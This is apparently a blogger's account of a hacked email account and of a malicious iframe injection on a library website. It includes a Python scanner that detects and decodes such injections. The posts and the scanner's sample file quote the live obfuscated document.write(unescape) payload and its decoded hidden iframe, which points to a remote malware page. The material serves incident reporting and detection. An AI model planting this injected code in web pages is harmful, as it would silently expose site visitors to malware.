I’ve been hacked. (Updated) (Updated again) (another update)

UPDATE 3: OK I am once again back in my gmail account now for just under 24 hours. I’m still leery of logging in from anywhere BUT my phone (and my parent’s office PC that is brand new and rarely used) and am going to do a clean install of Windows on my computer just to be safe. Microsoft Security Essentials and Malwarebytes Anti-Malware both came up with bupkis on my home and office PC but our Trend Micro enterprise software did find a startling number of viruses on the two computers at our Reference Desk so right now my main suspicion is there (one of which was one of the last computers I used on Wednesday night since I work the evening shift). I haven’t made an attempt to recover my gmail account for this blog but I have posted a new one for the time being. Of course I’m still locked out of facebook which is both a blessing and a curse, plus I reset my phone to factory defaults so I lost all of my contacts. Right now all that’s left is a vague feeling of violation. Needless to say, my review for Chasing the Dragon is a bit delayed. Barring more crises I hope to have it up by Monday afternoon at the latest.

UPDATE 2: So where I thought the problem was my home PC it is entirely possible that it is my work PC since, after updating my password, IT HAPPENED AGAIN while I was at lunch and even reset the password on the yahoo account I JUST MADE. I don’t really want or need this kind of stress. Right now running a virus scan and Malwarebytes Anti-Malware on my desk PC. This is REALLY REALLY lame.

UPDATE 1: I’m now back in my WAAAAAAAAAY more important personal email account. The email I used for contact on this blog has been “deactivated due to suspicious activity.” I’ve since put a different email on the “About” page. My suspicion now is that whatever did this got access to a very very old yahoo account first since there were password reset emails I don’t remember asking about and somehow got in that way. That account has since been deleted. But maybe I’m wrong and it happened some other way. Regardless, it was a mighty scare, and this is the closest I’ve come to wanting a drink so early in the frickin’ day. I still don’t have access to my Facebook account but hopefully I’ll have that back sometime later today or tomorrow (something I won’t cry over).

I am not in Cardiff and I have not been mugged.

However, my Google account has been hacked.

I suspect it was a keylogger from a **cough**bittorrent**cough** site.

For those wondering:  THIS IS FUCKING TERRIFYING.

It’s easy to forget just how much of one’s online existence is tied to a single account.

I’m hoping everything can be resolved.  God help me if it can’t.


Malicious Javascript Update

As mentioned previously, we have been plagued as of late by a particularly nasty and resilient bit of iframe hacking.  While our Trend Micro software managed to pick up absolutely nada I discovered that Kaspersky has an online scanner.  Roughly 3 hours and 19 minutes later and voila!  8 infected files and 5 viruses! Not to mention a ridiculous amount of locked files.  Among those 5 viruses is a little sucker named “Trojan-Downloader.HTML.IFrame.bu” which I’m hoping is the tenacious bastard responsible for our little problem.

Malicious javascript: document.write (unescape

Some malicious javascript has been appearing on the website of the library I work at:

document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%2F%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));

this translates to:

<iframe src="http://mn96.dns.gendistr.info/qualitytest/" width=0 height=0></iframe>

The website attempts to offer a virus disguised as ad protection software.  I can delete the code but it reappears (likely if/when the server is rebooted).  The code goes deep enough to appear in the iisstart.asp, localstart.asp, and browser_detect.asp.   Since I’m technically only the webmaster (for a new webpage that isn’t even up yet, don’t ask, I don’t manage the servers or other hardware) with exactly 0 experience with IIS (we have a consultant for that) I’m not sure where to go from here.
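The injected snippet above is a common pattern: an attacker hides a zero-size iframe behind document.write(unescape(...)) so a casual read of the page source shows only percent-encoded noise. The following is an added example (not the blog author's code) of how a defender can scan .asp/.html files for that pattern, decode the payload the way JavaScript's legacy unescape() would, and flag any iframe that is hidden (zero width/height or display:none) along with its src. The sample file content is constructed here to resemble an infected iisstart.asp; the payload itself is the one quoted on this page.

```python
"""Find obfuscated document.write(unescape(...)) iframe injections in page source.

Added example, not the blog author's code. Given the text of an .asp or .html
file, locate document.write(unescape('...')) calls, decode the percent-encoded
payload, and report any <iframe> that is hidden together with its src.
"""
from __future__ import annotations

import os
import re
from urllib.parse import unquote

# document.write(unescape('...')) or document.write(unescape("...")), any spacing.
_INJECT_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL,
)
_IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name="value", name='value' or bare name=value
_ATTR_RE = re.compile(
    r"""([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE
)


def js_unescape(s: str) -> str:
    """Decode %uXXXX and %XX like JavaScript's legacy unescape() (Latin-1, not UTF-8)."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


def _attrs(attr_text: str) -> dict[str, str]:
    """Parse the attribute portion of a tag into a lower-cased name -> value dict."""
    out: dict[str, str] = {}
    for m in _ATTR_RE.finditer(attr_text):
        out[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return out


def is_hidden(attrs: dict[str, str]) -> bool:
    """True when the iframe is sized to zero or styled invisible."""
    def zero(v: str | None) -> bool:
        return v is not None and re.fullmatch(r"0+(px)?", v.strip()) is not None

    style = attrs.get("style", "").replace(" ", "").lower()
    return (
        zero(attrs.get("width"))
        or zero(attrs.get("height"))
        or "display:none" in style
        or "visibility:hidden" in style
    )


def find_injected_iframes(source: str) -> list[dict]:
    """Return one finding per iframe produced by a document.write(unescape(...)) call."""
    findings = []
    for m in _INJECT_RE.finditer(source):
        decoded = js_unescape(m.group(2))
        for fm in _IFRAME_RE.finditer(decoded):
            attrs = _attrs(fm.group(1))
            findings.append({
                "offset": m.start(),        # where in the file the injection sits
                "decoded": decoded,         # human-readable form of the payload
                "src": attrs.get("src"),    # remote page the victim's browser fetches
                "hidden": is_hidden(attrs), # zero-size or invisible -> strongly suspicious
            })
    return findings


def scan_tree(root: str, exts: tuple[str, ...] = (".asp", ".html", ".htm", ".js")) -> dict[str, list[dict]]:
    """Walk a web root (e.g. wwwroot) and map each file path to its findings."""
    results: dict[str, list[dict]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1", errors="replace") as fh:
                    hits = find_injected_iframes(fh.read())
                if hits:
                    results[path] = hits
    return results


# Constructed sample resembling an infected iisstart.asp; the payload is the one quoted above.
SAMPLE_ASP = """<%@ Language=VBScript %>
<html><head><title>Library</title></head><body>
<h1>Welcome</h1>
<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%2F%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_injected_iframes(SAMPLE_ASP):
        flag = "HIDDEN" if hit["hidden"] else "visible"
        print(f"offset {hit['offset']}: {flag} iframe -> {hit['src']}")
        print("  decoded:", hit["decoded"])
```

Point scan_tree at the web root to get a per-file list of injected iframes; because the hits include the file offset and the decoded tag, the output doubles as a record for the server administrator of exactly which files were modified and what they loaded. Note that a hit with hidden == False is still worth reviewing, since document.write(unescape(...)) has few legitimate uses in a static site.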

We’re running IIS 5.0 and I, for the life of me, can’t figure what item (if any) allows the replication of the code. Any help would be much appreciated.

P.S.:  To make matters worse the wwwroot folder is clogged with sh*ttons of legacy files that no-one needs/uses.